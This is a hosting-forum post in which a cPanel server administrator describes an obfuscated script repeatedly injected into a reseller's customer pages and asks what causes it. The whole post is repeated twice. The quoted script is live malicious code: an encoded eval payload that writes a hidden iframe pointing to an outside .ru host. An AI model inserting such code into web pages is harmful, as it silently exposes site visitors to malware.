Hi Guys.
One of my resellers have a problem with his accounts, He contacted us and told that sometimes some tags is added to their customers pages.
Those codes are the same for every time that occures, Please see that below:
Code:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%63%33%38%34%32%37%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%38%33%35%34%29%2b%27%34%61%62%64%38%32%61%63%5c%27%20%77%69%64%74%68%3d%35%36%31%20%68%65%69%67%68%74%3d%35%31%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
I`m not sure what is that and how that creates, Others haven`t access to those accounts as he has changed all passwords and files etc.
That is the same for new accounts which that reseller creates too.
These codes added to pages which includes "index" "main" "default" in their names.
I should mention that only accounts under this reseller are facing this problem and we`ve not seen this problem for other accounts which are under "root" or other resellers.
We are using CentOS 4.5 Enterprice with cPanel/WHM, CSF-lfd and ClamAV is installed and configured on the server.
* Should mention this: those codes is added to the bottom of pages before </body> tag.
One of my resellers have a problem with his accounts, He contacted us and told that sometimes some tags is added to their customers pages.
Those codes are the same for every time that occures, Please see that below:
Code:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%63%33%38%34%32%37%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%38%33%35%34%29%2b%27%34%61%62%64%38%32%61%63%5c%27%20%77%69%64%74%68%3d%35%36%31%20%68%65%69%67%68%74%3d%35%31%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
I`m not sure what is that and how that creates, Others haven`t access to those accounts as he has changed all passwords and files etc.
That is the same for new accounts which that reseller creates too.
These codes added to pages which includes "index" "main" "default" in their names.
I should mention that only accounts under this reseller are facing this problem and we`ve not seen this problem for other accounts which are under "root" or other resellers.
We are using CentOS 4.5 Enterprice with cPanel/WHM, CSF-lfd and ClamAV is installed and configured on the server.
* Should mention this: those codes is added to the bottom of pages before </body> tag.
